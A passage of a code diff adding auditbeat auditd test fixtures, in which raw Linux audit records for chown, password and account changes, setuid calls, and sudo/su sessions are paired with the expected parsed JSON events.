"session": "8", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/bin/chown", + "object": { + "primary": "test", + "type": "file" + } + } + }, + "event": { + "action": "changed-file-ownership-of", + "category": [ + "file" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611091464.740:263): arch=c000003e syscall=260 success=yes exit=0 a0=ffffffffffffff9c a1=12d6210 a2=3e9 a3=ffffffff items=1 ppid=9492 pid=9494 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=8 comm=\"chown\" exe=\"/usr/bin/chown\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=CWD msg=audit(1611091464.740:263): cwd=\"/home/vagrant\"", + "type=PATH msg=audit(1611091464.740:263): item=0 name=\"test\" inode=921833 dev=fd:02 mode=0100664 ouid=9999 ogid=1000 rdev=00:00 obj=unconfined_u:object_r:user_home_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0", + "type=PROCTITLE msg=audit(1611091464.740:263): proctitle=63686F776E002D5200616C6963650074657374" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "file": { + "device": "00:00", + "gid": "1000", + "group": "vagrant", + "inode": "921833", + "mode": "0664", + "owner": "bob", + "path": "test", + "selinux": { + "domain": "user_home_t", + "level": "s0", + "role": "object_r", + "user": "unconfined_u" + }, + "uid": "9999" + }, + "process": { + "executable": "/usr/bin/chown", + "name": "chown", + "pid": 9494, + "ppid": 9492, + "title": "chown -R alice test", + "working_directory": "/home/vagrant" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "filesystem": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/passwd.log b/auditbeat/module/auditd/testdata/passwd.log new file mode 100644 index 000000000000..6ae44815ba49 --- /dev/null +++ b/auditbeat/module/auditd/testdata/passwd.log @@ -0,0 +1,4 @@ +type=USER_CHAUTHTOK msg=audit(1610986912.458:797): pid=13107 uid=0 auid=1002 ses=15 msg='op=PAM:chauthtok acct="bob" exe="/usr/bin/passwd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/1 res=success' +type=USER_CHAUTHTOK msg=audit(1610987544.541:805): pid=13379 uid=0 auid=1000 ses=14 msg='op=changing comment id=1003 exe="/usr/sbin/usermod" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_CHAUTHTOK msg=audit(1610987708.643:810): pid=13519 uid=0 auid=1000 ses=14 msg='op=changing name id=1003 exe="/usr/sbin/usermod" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610988774.279:815): pid=13812 uid=0 auid=1000 ses=14 msg='op=changing /etc/group; group bob/1003, new name: bobby acct="bob" exe="/usr/sbin/groupmod" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success' diff --git a/auditbeat/module/auditd/testdata/passwd.log-expected.json b/auditbeat/module/auditd/testdata/passwd.log-expected.json new file mode 100644 index 000000000000..d12ceeb57396 --- /dev/null +++ b/auditbeat/module/auditd/testdata/passwd.log-expected.json @@ -0,0 +1,282 @@ +[ + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:chauthtok", + "terminal": "pts/1" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 797, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/passwd", + "object": { + "primary": "pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610986912.458:797): pid=13107 uid=0 auid=1002 ses=15 msg='op=PAM:chauthtok acct=\"bob\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/bin/passwd", + "pid": 13107 + }, + "related": { + "user": [ + "bob", + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob", + "target": { + "id": "9999", + "name": "bob" + } + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1003", + "op": "changing", + "terminal": "pts/2" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 805, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "charlie" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610987544.541:805): pid=13379 uid=0 auid=1000 ses=14 msg='op=changing comment id=1003 exe=\"/usr/sbin/usermod\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 13379 + }, + "related": { + "user": [ + "charlie", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1003", + "name": "charlie" + } + } + }, + { + "auditd": { + "data": { + "hostname": "ubuntu-bionic", + "id": "1003", + "op": "changing", + "terminal": "pts/2" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 810, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "charlie" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/2", + "secondary": "ubuntu-bionic", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610987708.643:810): pid=13519 uid=0 auid=1000 ses=14 msg='op=changing name id=1003 exe=\"/usr/sbin/usermod\" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 13519 + }, + "related": { + "user": [ + "charlie", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1003", + "name": "charlie" + } + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "hostname": "ubuntu-bionic", + "op": "changing", + "terminal": "pts/2" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 815, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/groupmod", + "object": { + "primary": "pts/2", + "secondary": "ubuntu-bionic", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610988774.279:815): pid=13812 uid=0 auid=1000 ses=14 msg='op=changing /etc/group; group bob/1003, new name: bobby acct=\"bob\" exe=\"/usr/sbin/groupmod\" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/sbin/groupmod", + "pid": 13812 + }, + "related": { + "user": [ + "bob", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1000", + "name": "vagrant" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/setuid.log b/auditbeat/module/auditd/testdata/setuid.log new file mode 100644 index 000000000000..1e0292a8e679 --- /dev/null +++ b/auditbeat/module/auditd/testdata/setuid.log @@ -0,0 +1,6 @@ +type=SYSCALL msg=audit(1611163038.267:531): arch=c000003e syscall=106 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="setuids" exe="/tmp/setuids" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=PROCTITLE msg=audit(1611163038.267:531): proctitle="/tmp/setuids" +type=SYSCALL msg=audit(1611163038.267:529): arch=c000003e syscall=117 success=yes exit=0 a0=ffffffffffffffff a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=1000 suid=0 fsuid=1000 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="setuids" exe="/tmp/setuids" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=PROCTITLE msg=audit(1611163038.267:529): proctitle="/tmp/setuids" +type=SYSCALL msg=audit(1611163038.267:530): arch=c000003e syscall=105 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=0 fsgid=1000 tty=pts0 ses=1 comm="setuids" exe="/tmp/setuids" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=PROCTITLE msg=audit(1611163038.267:530): proctitle="/tmp/setuids" diff --git a/auditbeat/module/auditd/testdata/setuid.log-expected.json b/auditbeat/module/auditd/testdata/setuid.log-expected.json new file mode 100644 index 000000000000..f5d29f8453ee --- /dev/null +++ b/auditbeat/module/auditd/testdata/setuid.log-expected.json @@ -0,0 +1,291 @@ +[ + { + "auditd": { + "data": { + "a0": "0", + "a1": "3e8", + "a2": "ffffffffffffffff", + "a3": "7ffe354fcc60", + "arch": "x86_64", + "exit": "0", + "syscall": "setgid", + "tty": "pts0" + }, + "message_type": "syscall", + "result": "success", + "sequence": 531, + "session": "1", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "setgid", + "object": { + "type": "process" + } + } + }, + "event": { + "action": "changed-identity-of", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611163038.267:531): arch=c000003e syscall=106 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm=\"setuids\" exe=\"/tmp/setuids\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=PROCTITLE msg=audit(1611163038.267:531): proctitle=\"/tmp/setuids\"" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "process": { + "executable": "/tmp/setuids", + "name": "setuids", + "pid": 19930, + "ppid": 1541, + "title": "/tmp/setuids" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "filesystem": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "group": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + }, + { + "auditd": { + "data": { + "a0": "ffffffffffffffff", + "a1": "3e8", + "a2": "ffffffffffffffff", + "a3": "7ffe354fcc60", + "arch": "x86_64", + "exit": "0", + "syscall": "setresuid", + "tty": "pts0" + }, + "message_type": "syscall", + "result": "success", + "sequence": 529, + "session": "1", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "setresuid", + "object": { + "type": "process" + } + } + }, + "event": { + "action": "changed-identity-of", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611163038.267:529): arch=c000003e syscall=117 success=yes exit=0 a0=ffffffffffffffff a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=1000 suid=0 fsuid=1000 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm=\"setuids\" exe=\"/tmp/setuids\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=PROCTITLE msg=audit(1611163038.267:529): proctitle=\"/tmp/setuids\"" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "process": { + "executable": "/tmp/setuids", + "name": "setuids", + "pid": 19930, + "ppid": 1541, + "title": "/tmp/setuids" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "filesystem": { + "group": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + }, + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "1000", + "name": "vagrant", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + }, + { + "auditd": { + "data": { + "a0": "0", + "a1": "3e8", + "a2": "ffffffffffffffff", + "a3": "7ffe354fcc60", + "arch": "x86_64", + "exit": "0", + "syscall": "setuid", + "tty": "pts0" + }, + "message_type": "syscall", + "result": "success", + "sequence": 530, + "session": "1", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "setuid", + "object": { + "type": "process" + } + } + }, + "event": { + "action": "changed-identity-of", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611163038.267:530): arch=c000003e syscall=105 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=0 fsgid=1000 tty=pts0 ses=1 comm=\"setuids\" exe=\"/tmp/setuids\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=PROCTITLE msg=audit(1611163038.267:530): proctitle=\"/tmp/setuids\"" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "process": { + "executable": "/tmp/setuids", + "name": "setuids", + "pid": 19930, + "ppid": 1541, + "title": "/tmp/setuids" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "0", + "name": "root" + }, + "filesystem": { + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "0", + "name": "root" + }, + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "1000", + "name": "vagrant", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/sudo-asuser.log b/auditbeat/module/auditd/testdata/sudo-asuser.log new file mode 100644 index 000000000000..f9e02e9469ab --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo-asuser.log @@ -0,0 +1,5 @@ +type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ACCT msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd="/home/alice" cmd="bash" terminal=pts/1 res=success' +type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' diff --git a/auditbeat/module/auditd/testdata/sudo-asuser.log-expected.json b/auditbeat/module/auditd/testdata/sudo-asuser.log-expected.json new file mode 100644 index 000000000000..61aa7ffbdb51 --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo-asuser.log-expected.json @@ -0,0 +1,322 @@ +[ + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 458, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 459, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "cmd": "bash", + "terminal": "pts/1" + }, + "message_type": "user_cmd", + "result": "success", + "sequence": 460, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "oldbob" + }, + "object": { + "primary": "bash", + "type": "process" + } + } + }, + "event": { + "action": "ran-command", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd=\"/home/alice\" cmd=\"bash\" terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 14178, + "working_directory": "/home/alice" + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_refr", + "result": "success", + "sequence": 461, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "refreshed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 462, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/sudo.log b/auditbeat/module/auditd/testdata/sudo.log new file mode 100644 index 000000000000..086e7683f4c9 --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo.log @@ -0,0 +1,20 @@ +type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ACCT msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd="/home/alice" cmd="bash" terminal=pts/1 res=success' +type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_AUTH msg=audit(1610876634.103:457): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=failed' +type=CRED_ACQ msg=audit(1610735886.818:434): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ACCT msg=audit(1610735886.818:433): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:accounting acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_AUTH msg=audit(1610735886.818:432): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:authentication acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_START msg=audit(1610735886.818:431): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=CRED_REFR msg=audit(1610735886.818:430): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_CMD msg=audit(1610735886.818:429): pid=11791 uid=1002 auid=1002 ses=15 msg='cwd="/home/alice" cmd="su" terminal=pts/1 res=success' +type=USER_ACCT msg=audit(1610735886.818:428): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_AUTH msg=audit(1610735886.818:427): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ROLE_CHANGE msg=audit(1610735886.822:436): pid=11793 uid=0 auid=1002 ses=15 msg='op=su acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success selected-context=1234' +type=USER_START msg=audit(1610735886.822:435): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=CRED_DISP msg=audit(1610735949.474:440): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_END msg=audit(1610735949.474:439): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=CRED_DISP msg=audit(1610735949.474:438): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_END msg=audit(1610735949.474:437): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' diff --git a/auditbeat/module/auditd/testdata/sudo.log-expected.json b/auditbeat/module/auditd/testdata/sudo.log-expected.json new file mode 100644 index 000000000000..838e8b1831ae --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo.log-expected.json @@ -0,0 +1,1293 @@ +[ + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 458, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 459, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting 